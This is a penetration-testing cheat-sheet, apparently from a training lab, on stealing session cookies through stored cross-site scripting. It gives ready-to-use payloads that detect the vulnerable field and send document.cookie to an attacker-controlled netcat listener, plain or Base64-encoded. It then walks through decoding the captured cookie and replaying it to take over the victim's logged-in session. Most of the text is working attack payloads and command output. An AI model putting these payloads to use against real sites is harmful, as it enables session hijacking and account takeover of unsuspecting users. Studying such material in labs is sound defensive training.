OBTAINING SESSION COOKIES (NETCAT SERVER)
#discovery
root@oco:~$ BROWSER > {targetSite:port}
input field 1: "><img src=x onerror=prompt(document.domain)>
input field 2: "><img src=x onerror=confirm(1)>
input field 3: "><img src=x onerror=alert(1)>
* this identifies which input field is vulnerable to XSS: a different dialog function
  is used per field, so the popup that appears tells you which field fired
* prompt(document.domain) prints the origin the JavaScript runs under; this confirms
  the code executes in the context of the target domain and not inside a sandboxed
  frame or a different origin
  - JavaScript running in a sandboxed (different-origin) context cannot read the
    target's cookies or DOM, so it is useless for client-side attacks unless a
    sandbox escape exists
* if nothing fires automatically on page load, use the site's own buttons and forms
  (save, submit, view profile) to trigger the stored payload
#check that HttpOnly is "off" using Web Developer Tools
root@oco:~$ BROWSER > {targetSite:port} > F12 > Storage > Cookies > {targetSite}
HttpOnly: False
Secure: False
SameSite: None
* the Storage tab is Firefox; in Chromium-based browsers the same view is
  Application > Cookies
* HttpOnly: False is the precondition for this attack. document.cookie only returns
  cookies without the HttpOnly flag, so with HttpOnly: True the payloads below would
  exfiltrate nothing and another post-exploitation route would be needed
root@oco:~$ BROWSER > {targetSite:port}
vulnerable xss input field: <style>@keyframes x{}</style><video style="animation-name:x" onanimationend="window.location = 'http://<VPN/TUN Adapter IP>:8000/log.php?c=' + document.cookie;"></video>
* window.location is a property, not a function: assigning a URL to it navigates the
  victim's browser to our server, which the victim will notice. fetch() sends the
  request (with the cookies in the URL) in the background with no navigation, so it
  is the stealthier option.
* another sample payload: <h1 onmouseover='document.write(`<img src="http://<VPN/TUN Adapter IP>:8000?cookie=${btoa(document.cookie)}">`)'>test</h1>
root@oco:~$ nc -nlvp 8000
listening on [any] 8000 ...
#expected victim actions
root@target:~$ BROWSER > New Private Window > {targetSite:port}
* log in to the application
root@target:~$ BROWSER > http://xss.htb.net/profile?email=ela.stienen@example.com
* view the public profile
  - this is the attacker-controlled public profile hosting the cookie-stealing
    payload via the stored XSS vulnerability
* the moment the target hovers over the "test" heading, onmouseover fires and the
  injected <img> request sends the target's cookie data to the attacker's listener
root@oco:~$ nc -nlvp 8000
listening on [any] 8000 ...
connect to [10.10.14.36] from (UNKNOWN) [10.10.14.36] 37106
GET /?cookie=YXV0aC1zZXNzaW9...
* the cookie arrives Base64-encoded because the payload wrapped document.cookie in
  btoa(); netcat only prints the raw request line and never answers it, so the
  victim's <img> shows a broken image and the listener exits after one connection
#decode
root@oco:~$ BROWSER > {anySite} > F12 > Console
input: atob("YXV0aC1zZXNzaW9...")
output: auth-session=s%3AQZOROUpdXhN0
* the %3A is a percent-encoded colon; it is part of the value exactly as the server
  set it, so keep it unchanged when replaying the cookie
root@oco:~$ BROWSER > New Private Window > {targetSite:port} > F12 > Storage > Cookies > {targetFQDN}
Name: {auth-session}
Value: {cookieValue}
* refresh the target page; the browser now sends the stolen session cookie and the
  application treats us as the logged-in victim